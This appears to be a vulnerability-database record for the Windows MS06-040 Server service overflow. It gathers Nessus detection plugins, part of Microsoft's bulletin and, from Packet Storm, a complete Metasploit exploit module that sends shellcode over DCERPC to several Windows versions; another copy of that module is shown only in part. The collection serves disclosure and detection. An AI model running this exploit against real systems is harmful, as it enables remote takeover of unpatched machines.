rand_text_alphanumeric(32) +\n\n # The cookie is constant,\n # noticed by Nicolas Pouvesle in Misc #28\n \"\\x4e\\xe6\\x40\\xbb\" +\n\n # Padding\n rand_text_alphanumeric(4) +\n\n # Jump straight to shellcode\n [ mytarget.ret ].pack('V') +\n\n # Padding\n rand_text_alphanumeric(8) +\n\n # Address to write our shellcode\n [ mytarget.ret ].pack('V') +\n\n # Padding\n rand_text_alphanumeric(40) +\n\n # Terminate the path\n \"\\x00\\x00\"\n\n stub =\n NDR.long(rand(0xffffffff)) +\n NDR.UnicodeConformantVaryingString('') +\n NDR.UnicodeConformantVaryingStringPreBuilt(path) +\n NDR.long(rand(0xf0)+1) +\n NDR.UnicodeConformantVaryingString('') +\n NDR.long(rand(0xf0)+1) +\n NDR.long(0)\n\n end\n\n print_status(\"Calling the vulnerable function...\")\n\n begin\n dcerpc.call(0x1f, stub, false)\n dcerpc.call(0x1f, stub, false)\n rescue Rex::Proto::DCERPC::Exceptions::NoResponse\n rescue => e\n if e.to_s !~ /STATUS_PIPE_DISCONNECTED/\n raise e\n end\n end\n\n # Cleanup\n handler\n disconnect\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/smb/ms06_040_netapi.rb"}], "nessus": [{"lastseen": "2019-02-21T01:09:21", "bulletinFamily": "scanner", "description": "The remote host is vulnerable to a buffer overrun in the 'Server' service that could allow an attacker to execute arbitrary code on the remote host with 'SYSTEM' privileges.", "modified": "2018-11-15T00:00:00", "id": "SMB_NT_MS06-040.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=22182", "published": "2006-08-08T00:00:00", "title": "MS06-040: Vulnerability in Server Service Could Allow Remote Code Execution (921883)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22182);\n script_version(\"1.32\");\n script_cvs_date(\"Date: 2018/11/15 
20:50:30\");\n\n script_cve_id(\"CVE-2006-3439\");\n script_bugtraq_id(19409);\n script_xref(name:\"CERT\", value:\"650769\");\n script_xref(name:\"MSFT\", value:\"MS06-040\");\n script_xref(name:\"MSKB\", value:\"921883\");\n\n script_name(english:\"MS06-040: Vulnerability in Server Service Could Allow Remote Code Execution (921883)\");\n script_summary(english:\"Determines the presence of update 921883\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code can be executed on the remote host due to a flaw in the\n'server' service.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is vulnerable to a buffer overrun in the 'Server'\nservice that could allow an attacker to execute arbitrary code on the\nremote host with 'SYSTEM' privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2006/ms06-040\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows 2000, XP and\n2003.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/08/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/08\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/08/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS06-040';\nkb = '921883';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win2k:'4,5', xp:'1,2', win2003:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif ( hotfix_is_vulnerable(os:\"5.2\", sp:0, file:\"Netapi32.dll\", version:\"5.2.3790.559\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:1, file:\"Netapi32.dll\", version:\"5.2.3790.2769\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:1, file:\"Netapi32.dll\", version:\"5.1.2600.1874\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:2, 
file:\"Netapi32.dll\", version:\"5.1.2600.2952\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.0\", file:\"Netapi32.dll\", version:\"5.0.2195.7105\", dir:\"\\system32\", bulletin:bulletin, kb:kb) )\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:09:21", "bulletinFamily": "scanner", "description": "The remote host is vulnerable to a buffer overrun in the 'Server' service that may allow an attacker to execute arbitrary code on the remote host with 'SYSTEM' privileges.", "modified": "2018-11-15T00:00:00", "id": "SMB_KB921883.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=22194", "published": "2006-08-08T00:00:00", "title": "MS06-040: Vulnerability in Server Service Could Allow Remote Code Execution (921883) (uncredentialed check)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22194);\n script_version(\"1.32\");\n script_cvs_date(\"Date: 2018/11/15 20:50:28\");\n\n script_cve_id(\"CVE-2006-3439\");\n script_bugtraq_id(19409);\n script_xref(name:\"MSFT\", value:\"MS06-040\");\n script_xref(name:\"MSKB\", value:\"921883\");\n\n script_name(english:\"MS06-040: Vulnerability in Server Service Could Allow Remote Code Execution (921883) (uncredentialed check)\");\n script_summary(english:\"Determines the presence of update 921883\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code can be executed on the remote host due to a flaw in the\n'Server' service.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is vulnerable to a buffer overrun in the 'Server'\nservice that may allow 
an attacker to execute arbitrary code on the\nremote host with 'SYSTEM' privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2006/ms06-040\");\n script_set_attribute(attribute:\"solution\", value:\"Microsoft has released a set of patches for Windows 2000, XP and 2003.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2006-3439\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/08/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/08/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Windows\");\n\n script_dependencies(\"smb_nativelanman.nasl\",\"smb_login.nasl\");\n script_require_keys(\"Host/OS/smb\");\n script_require_ports(139, 445);\n exit(0);\n}\n\n#\n\ninclude ('smb_func.inc');\n\nglobal_var rpipe;\n\nfunction NetPathCanonicalize ()\n{\n local_var fid, data, rep, ret;\n\n fid = bind_pipe (pipe:\"\\browser\", uuid:\"4b324fc8-1670-01d3-1278-5a47bf6ee188\", vers:3);\n if (isnull (fid))\n return 0;\n\n # we initialize the buffer first\n data = class_parameter (name:\"m\", ref_id:0x20000) +\n class_name (name:\"\") +\n raw_dword (d:20) +\n class_name (name:\"nessus\") + # wcscpy in the buffer\n raw_dword (d:1) +\n raw_dword (d:0) ;\n\n\n data = dce_rpc_pipe_request (fid:fid, code:0x1f, data:data);\n if (!data)\n return 0;\n\n rep = dce_rpc_parse_response (fid:fid, data:data);\n if (!rep || (strlen(rep) != 32))\n return 0;\n\n ret = get_dword (blob:rep, pos:strlen(rep)-4);\n if ((ret != 0x84b) && (ret != 0x7b))\n return 0;\n\n # the patch should fill the buffer with 0, else it will return \"nessus\"\n data = class_parameter (name:\"m\", ref_id:0x20000) +\n class_name (name:\"\") + # the path reinitialize the buffer\n raw_dword (d:20) +\n class_name (name:\"\") +\n raw_dword (d:1) +\n raw_dword (d:0) ;\n\n data = dce_rpc_pipe_request (fid:fid, code:0x1f, data:data);\n if (!data)\n return 0;\n\n rep = dce_rpc_parse_response (fid:fid, data:data);\n if (!rep || (strlen(rep) != 32))\n return 0;\n\n ret = get_dword (blob:rep, pos:strlen(rep)-4);\n if ((ret != 0x84b) && (ret != 0x7b))\n return 0;\n\n ret = get_dword (blob:rep, pos:0);\n if (ret != 20)\n return 0;\n\n ret = get_string (blob:rep, pos:4, _type:1);\n if (ret == \"nessus\\\")\n return 1;\n\n return 0;\n}\n\nos = get_kb_item (\"Host/OS/smb\") ;\nif (\"Windows\" >!< os) exit(0);\n\nname = kb_smb_name();\nport = kb_smb_transport();\n\nif ( ! get_port_state(port) ) exit(0);\nsoc = open_sock_tcp(port);\nif ( ! 
soc ) exit(0);\n\nsession_init(socket:soc, hostname:name);\n\nr = NetUseAdd(share:\"IPC$\");\nif ( r == 1 )\n{\n ret = NetPathCanonicalize ();\n if (ret == 1)\n security_hole(port:port);\n\n NetUseDel();\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:17:29", "bulletinFamily": "exploit", "description": "", "modified": "2009-11-26T00:00:00", "published": "2009-11-26T00:00:00", "href": "https://packetstormsecurity.com/files/82940/Microsoft-Server-Service-NetpwPathCanonicalize-Overflow.html", "id": "PACKETSTORM:82940", "type": "packetstorm", "title": "Microsoft Server Service NetpwPathCanonicalize Overflow", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::DCERPC \ninclude Msf::Exploit::Remote::SMB \n \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Microsoft Server Service NetpwPathCanonicalize Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in the NetApi32 CanonicalizePathName() function \nusing the NetpwPathCanonicalize RPC call in the Server Service. It is likely that \nother RPC calls could be used to exploit this service. This exploit will result in \na denial of service on on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt \nwill likely result in a complete reboot on Windows 2000 and the termination of all \nSMB-related services on Windows XP. The default target for this exploit should succeed \non Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0. 
\n}, \n'Author' => \n[ \n'hdm' \n], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2006-3439' ], \n[ 'OSVDB', '27845' ], \n[ 'BID', '19409' ], \n[ 'MSB', 'MS06-040' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Privileged' => true, \n'Payload' => \n{ \n# Technically we can use more space than this, but by limiting it \n# to 370 bytes we can use the same request for all Windows SPs. \n'Space' => 370, \n'BadChars' => \"\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\", \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'DefaultTarget' => 0, \n'Targets' => \n[ \n[ '(wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)', { } ], \n[ '(wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4', \n{ \n'Offset' => 1000, \n'Ret' => 0x00020804 \n} \n], \n[ '(wcscpy) Windows XP SP0/SP1', \n{ \n'Offset' => 612, \n'Ret' => 0x00020804 \n} \n], \n[ '(stack) Windows XP SP1 English', \n{ \n'OffsetA' => 656, \n'OffsetB' => 680, \n'Ret' => 0x71ab1d54 # jmp esp @ ws2_32.dll \n} \n], \n[ '(stack) Windows XP SP1 Italian', \n{ \n'OffsetA' => 656, \n'OffsetB' => 680, \n'Ret' => 0x71a37bfb # jmp esp @ ws2_32.dll \n} \n], \n[ '(wcscpy) Windows 2003 SP0', \n{ \n'Offset' => 612, \n'Ret' => 0x00020804 \n} \n], \n], \n \n'DisclosureDate' => 'Aug 8 2006')) \n \nregister_options( \n[ \nOptString.new('SMBPIPE', [ true, \"The pipe name to use (BROWSER, SRVSVC)\", 'BROWSER']), \n], self.class) \n \nend \n \ndef exploit \n \nconnect() \nsmb_login() \n \nif (target.name =~ /Automatic/) \ncase smb_peer_os() \nwhen 'Windows 5.0' \nprint_status(\"Detected a Windows 2000 target\") \ntarget = targets[1] \n \nwhen 'Windows NT 4.0' \nprint_status(\"Detected a Windows NT 4.0 target\") \ntarget = targets[1] \n \nwhen 'Windows 5.1' \nbegin \nsmb_create(\"\\\\SRVSVC\") \nprint_status(\"Detected a Windows XP SP0/SP1 target\") \nrescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e \nif (e.error_code == 0xc0000022) \nprint_status(\"Windows XP SP2 is not 
exploitable\") \nreturn \nend \nprint_status(\"Detected a Windows XP target (unknown patch level)\") \nend \ntarget = targets[2] \n \nwhen /Windows Server 2003 (\\d+)$/ \nprint_status(\"Detected a Windows 2003 SP0 target\") \ntarget = targets[5] \n \nwhen /Windows Server 2003 (\\d+) Service Pack (\\d+)/ \nprint_status(\"Windows 2003 SP#{$2} is not exploitable\") \nreturn \n \nwhen /Samba/ \nprint_status(\"Samba is not vulnerable\") \nreturn \n \nelse \nprint_status(\"No target detected for #{smb_peer_os()}/#{smb_peer_lm()}...\") \nreturn \nend \nend \n \n# Specific fixups for Windows NT \ncase smb_peer_os() \nwhen 'Windows NT 4.0' \nprint_status(\"Adjusting the SMB/DCERPC parameters for Windows NT\") \ndatastore['SMB::pipe_write_min_size'] = 2048 \ndatastore['SMB::pipe_write_max_size'] = 4096 \nend \n \nhandle = dcerpc_handle( \n'4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0', \n'ncacn_np', [\"\\\\#{datastore['SMBPIPE']}\"] \n) \n \nprint_status(\"Binding to #{handle} ...\") \ndcerpc_bind(handle) \nprint_status(\"Bound to #{handle} ...\") \n \n# \n# /* Function 0x1f at 0x767e912c */ \n# long function_1f ( \n# [in] [unique] [string] wchar_t * arg_00, \n# [in] [string] wchar_t * arg_01, \n# [out] [size_is(arg_03)] char * arg_02, \n# [in] [range(0, 64000)] long arg_03, \n# [in] [string] wchar_t * arg_04, \n# [in,out] long * arg_05, \n# [in] long arg_06 \n# ); \n# \n \nprint_status(\"Building the stub data...\") \nstub = '' \n \ncase target.name \n \n# This covers NT 4.0 as well \nwhen /wcscpy.*Windows 2000/ \n \ncode = make_nops(target['Offset'] - payload.encoded.length) + payload.encoded \n \npath = code + ( [target.ret].pack('V') * 16 ) + \"\\x00\\x00\" \n \nstub = \nNDR.long(rand(0xffffffff)) + \nNDR.UnicodeConformantVaryingString('') + \nNDR.UnicodeConformantVaryingStringPreBuilt(path) + \nNDR.long(rand(250)+1) + \nNDR.UnicodeConformantVaryingStringPreBuilt(\"\\xeb\\x02\\x00\\x00\") + \nNDR.long(rand(250)+1) + \nNDR.long(0) \n \nwhen /wcscpy.*Windows XP/ \npath = 
\n# Payload goes first \npayload.encoded + \n \n# Padding \nrand_text_alphanumeric(target['Offset'] - payload.encoded.length) + \n \n# Land 6 bytes in to bypass garbage (XP SP0) \n[ target.ret + 6 ].pack('V') + \n \n# Padding \nrand_text_alphanumeric(8) + \n \n# Address to write our shellcode (XP SP0) \n[ target.ret ].pack('V') + \n \n# Padding \nrand_text_alphanumeric(32) + \n \n# Jump straight to shellcode (XP SP1) \n[ target.ret ].pack('V') + \n \n# Padding \nrand_text_alphanumeric(8) + \n \n# Address to write our shellcode (XP SP1) \n[ target.ret ].pack('V') + \n \n# Padding \nrand_text_alphanumeric(32) + \n \n# Terminate the path \n\"\\x00\\x00\" \n \nstub = \nNDR.long(rand(0xffffffff)) + \nNDR.UnicodeConformantVaryingString('') + \nNDR.UnicodeConformantVaryingStringPreBuilt(path) + \nNDR.long(rand(0xf0)+1) + \nNDR.UnicodeConformantVaryingString('') + \nNDR.long(rand(0xf0)+1) + \nNDR.long(0) \n \n \nwhen /stack/ \nbuff = rand_text_alphanumeric(800) \nbuff[0, payload.encoded.length] = payload.encoded \nbuff[ target['OffsetA'], 4 ] = [target.ret].pack('V') \nbuff[ target['OffsetB'], 5 ] = \"\\xe9\" + [ (target['OffsetA'] + 5) * -1 ].pack('V') \n \npath = \"\\\\\\x00\\\\\\x00\" + buff + \"\\x00\\x00\" \n \nstub = \nNDR.long(rand(0xffffffff)) + \nNDR.UnicodeConformantVaryingString('') + \nNDR.UnicodeConformantVaryingStringPreBuilt(path) + \nNDR.long(rand(0xf0)+1) + \nNDR.UnicodeConformantVaryingString('') + \nNDR.long(rand(0xf0)+1) + \nNDR.long(0) \n \n \nwhen /wcscpy.*Windows 2003/ \npath = \n# Payload goes first \npayload.encoded + \n \n# Padding \nrand_text_alphanumeric(target['Offset'] - payload.encoded.length) + \n \n# Padding \nrand_text_alphanumeric(32) + \n \n# The cookie is constant, \n# noticed by Nicolas Pouvesle in Misc #28 \n\"\\x4e\\xe6\\x40\\xbb\" + \n \n# Padding \nrand_text_alphanumeric(4) + \n \n# Jump straight to shellcode \n[ target.ret ].pack('V') + \n \n# Padding \nrand_text_alphanumeric(8) + \n \n# Address to write our shellcode \n[ 
target.ret ].pack('V') + \n \n# Padding \nrand_text_alphanumeric(40) + \n \n# Terminate the path \n\"\\x00\\x00\" \n \nstub = \nNDR.long(rand(0xffffffff)) + \nNDR.UnicodeConformantVaryingString('') + \nNDR.UnicodeConformantVaryingStringPreBuilt(path) + \nNDR.long(rand(0xf0)+1) + \nNDR.UnicodeConformantVaryingString('') + \nNDR.long(rand(0xf0)+1) + \nNDR.long(0) \n \nend \n \nprint_status(\"Calling the vulnerable function...\") \n \nbegin \ndcerpc.call(0x1f, stub) \ndcerpc.call(0x1f, stub) \nrescue Rex::Proto::DCERPC::Exceptions::NoResponse \nrescue => e \nif e.to_s !~ /STATUS_PIPE_DISCONNECTED/ \nraise e \nend \nend \n \n# Cleanup \nhandler \ndisconnect \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/82940/ms06_040_netapi.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:18", "bulletinFamily": "software", "description": "Microsoft Security Bulletin MS06-040\r\nVulnerability in Server Service Could Allow Remote Code Execution (921883)\r\nPublished: August 8, 2006\r\n\r\nVersion: 1.0\r\nSummary\r\n\r\nWho Should Read this Document: Customers who use Microsoft Windows\r\n\r\nImpact of Vulnerability: Remote Code Execution\r\n\r\nMaximum Severity Rating: Critical\r\n\r\nRecommendation: Customers should apply the update immediately\r\n\r\nSecurity Update Replacement: None\r\n\r\nCaveats: None\r\n\r\nTested Software and Security Update Download Locations:\r\n\r\nAffected Software:\r\n\u2022\t\r\n\r\nMicrosoft Windows 2000 Service Pack 4 \u2014 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2 \u2014 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows XP Professional x64 Edition \u2014 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1 \u2014 Download the update\r\n\u2022\t\r\n\r\nMicrosoft 
Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with SP1 for Itanium-based Systems \u2014 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 x64 Edition \u2014 Download the update\r\n\r\nThe software in this list has been tested to determine whether the versions are affected. Other versions either no longer include security update support or may not be affected. To determine the support life cycle for your product and version, visit the Microsoft Support Lifecycle Web site.\r\n\r\nNote The security updates for Microsoft Windows Server 2003, Windows Server 2003 Service Pack 1, and Windows Server 2003 x64 Edition also apply to Windows Server 2003 R2.\r\nTop of sectionTop of section\r\nGeneral Information\r\n\t\r\nExecutive Summary\r\n\r\nExecutive Summary:\r\n\r\nThis update resolves a privately disclosed vulnerability as well as additional issues discovered through internal investigations.\r\n\r\nAn attacker who successfully exploited the vulnerability could take complete control of an affected system. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nWe recommend that customers apply the update immediately\r\n\r\nSeverity Ratings and Vulnerability Identifiers:\r\nVulnerability Identifiers\tImpact of Vulnerability\tWindows 2000\tWindows XP Service Pack 1\tWindows XP Service Pack 2\tWindows Server 2003\tWindows Server 2003 Service Pack 1\r\n\r\nBuffer Overrun in Server Service Vulnerability - CVE-2006-3439\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\r\nAggregate Severity of All Vulnerabilities\r\n\t\r\n\r\n \r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\r\nThis assessment is based on the types of systems that are affected by the vulnerability, their typical deployment patterns, and the effect that exploiting the vulnerability would have on them.\r\n\r\nNote The security updates for Windows Server 2003, Windows Server 2003 Service Pack 1, and Windows Server 2003 x64 Edition also apply to Windows Server 2003 R2.\r\n\r\nNote The severity ratings for non-x86 operating system versions map to the x86 operating systems versions as follows:\r\n\u2022\t\r\n\r\nThe Windows XP Professional x64 Edition severity rating is the same as the Windows Server 2003 Service Pack 1\r\n\u2022\t\r\n\r\nThe Windows Server 2003 and Windows Server 2003 Service Pack 1 for Itanium-based Systems severity rating are the same as the Windows Server 2003 severity rating.\r\n\u2022\t\r\n\r\nThe Windows Server 2003 x64 Edition severity rating is the same as the Windows Server 2003 Service Pack 1 severity rating.\r\nTop of sectionTop of section\r\n\t\r\nFrequently Asked Questions (FAQ) Related to This Security Update\r\n\r\nExtended security update support for Microsoft Windows 98, Windows 98 Second Edition, or Windows Millennium Edition ended on July 11, 
2006. I am still using one of these operating systems; what should I do?\r\nWindows 98, Windows 98 Second Edition, and Windows Millennium Edition have reached the end of their support life cycles. It should be a priority for customers who have these operating system versions to migrate to supported versions to prevent potential exposure to vulnerabilities. For more information about the Windows Product Lifecycle, visit the following Microsoft Support Lifecycle Web site. For more information about the extended security update support period for these operating system versions, visit the Microsoft Product Support Services Web site.\r\n\r\nExtended security update support for Microsoft Windows NT Workstation 4.0 Service Pack 6a and Windows 2000 Service Pack 2 ended on June 30, 2004. Extended security update support for Microsoft Windows NT Server 4.0 Service Pack 6a ended on December 31, 2004. Extended security update support for Microsoft Windows 2000 Service Pack 3 ended on June 30, 2005. I am still using one of these operating systems; what should I do?\r\nWindows NT Workstation 4.0 Service Pack 6a, Windows NT Server 4.0 Service Pack 6a, Windows 2000 Service Pack 2, and Windows 2000 Service Pack 3 have reached the end of their support life cycles. It should be a priority for customers who have these operating system versions to migrate to supported versions to prevent potential exposure to vulnerabilities. For more information about the Windows Product Lifecycle, visit the following Microsoft Support Lifecycle Web site. For more information about the extended security update support period for these operating system versions, visit the Microsoft Product Support Services Web site.\r\n\r\nCustomers who require custom support for these products must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. 
Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit the Microsoft Worldwide Information Web site, select the country, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager. For more information, see the Windows Operating System Product Support Lifecycle FAQ.\r\n\r\nFor more information, visit the Windows Operating System FAQ.\r\n\r\nCan I use the Microsoft Baseline Security Analyzer (MBSA) to determine whether this update is required?\r\nThe following table provides the MBSA detection summary for this security update.\r\nProduct\tMBSA 1.2.1\tMBSA 2.0\r\n\r\nMicrosoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows XP Professional x64 Edition\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with Service Pack 1 for Itanium-based Systems\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 x64 Edition family\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nFor more information about MBSA, visit the MBSA Web site. 
For more information about the programs that Microsoft Update and MBSA 2.0 currently do not detect, see Microsoft Knowledge Base Article 895660.\r\n\r\nFor more detailed information, see Microsoft Knowledge Base Article 910723.\r\n\r\nFor more information about MBSA, visit the MBSA Web site.\r\n\r\nFor more information about the programs that Microsoft Update and MBSA 2.0 currently do not detect, see Microsoft Knowledge Base Article 895660.\r\n\r\nFor more detailed information, see Microsoft Knowledge Base Article 910723.\r\n\r\nWhat is the Enterprise Update Scan Tool (EST)?\r\nAs part of an ongoing commitment to provide detection tools for bulletin-class security updates, Microsoft delivers a stand-alone detection tool whenever the Microsoft Baseline Security Analyzer (MBSA) and the Office Detection Tool (ODT) cannot detect whether the update is required for an MSRC release cycle. This stand-alone tool is called the Enterprise Update Scan Tool (EST) and is designed for enterprise administrators. When a version of the Enterprise Update Scan Tool is created for a specific bulletin, customers can run the tool from a command-line interface (CLI) and view the results of the XML output file. To help customers better utilize the tool, detailed documentation will be provided with the tool. 
